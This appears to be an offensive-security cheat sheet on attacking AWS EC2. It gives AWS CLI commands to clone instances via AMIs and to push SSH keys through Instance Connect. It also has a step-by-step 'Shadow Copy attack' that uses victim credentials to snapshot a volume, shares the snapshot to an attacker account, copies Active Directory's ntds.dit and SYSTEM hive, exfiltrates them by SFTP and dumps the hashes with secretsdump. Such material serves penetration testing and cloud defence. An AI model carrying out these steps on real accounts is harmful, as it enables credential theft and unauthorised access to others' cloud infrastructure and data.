AWS - Service - EC2
- dufflebag - Find secrets that are accidentally exposed via Amazon EBS's "public" mode
Copy EC2 using AMI Image
First you need to extract data about the current instances and their AMI/security groups/subnet : aws ec2 describe-images --region eu-west-1
# create a new image for the instance-id
$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1
# add key to AWS
$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1
# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
# now you can check the instance
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1
# If needed : edit groups
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1
# be a good guy, clean our instance to avoid any useless cost
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
Mount EBS volume to EC2 Linux
EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
- Head over to EC2 –> Volumes and create a new volume of your preferred size and type.
- Select the created volume, right click and select the "attach volume" option.
- Select the instance from the instance text box as shown below :
attach ebs volume
- Now, login to your ec2 instance and list the available disks using the following command :
lsblk
- Check if the volume has any data using the following command :
sudo file -s /dev/xvdf
- Format the volume to ext4 filesystem using the following command :
sudo mkfs -t ext4 /dev/xvdf
- Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” :
sudo mkdir /newvolume
- Mount the volume to "newvolume" directory using the following command :
sudo mount /dev/xvdf /newvolume/
- cd into newvolume directory and check the disk space for confirming the volume mount :
cd /newvolume; df -h .
Shadow Copy attack
Requirements:
- EC2:CreateSnapshot
- Static-Flow/CloudCopy
Exploit:
- Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
- Run
"Describe-Instances"
and show in list for attacker to select - Run
"Create-Snapshot"
on volume of selected instance - Run
"modify-snapshot-attribute"
on new snapshot to set"createVolumePermission"
to attacker AWS Account - Load AWS CLI with Attacker Credentials
- Run
"run-instance"
command to create new linux ec2 with our stolen snapshot - Ssh run
"sudo mkdir /windows"
- Ssh run
"sudo mount /dev/xvdf1 /windows/"
- Ssh run
"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"
- Ssh run
"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"
- Ssh run
"sudo chown ec2-user:ec2-user /home/ec2-user/*"
- SFTP get
"/home/ec2-user/SYSTEM ./SYSTEM"
- SFTP get
"/home/ec2-user/ntds.dit ./ntds.dit"
- locally run
"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'
, expects secretsdump to be on path
Access Snapshots
- Get the
owner-id
- List snapshots
- Create a volume using the previously obtained
snapshotId
- In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
Instance Connect
Push an SSH key to EC2 instance
# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds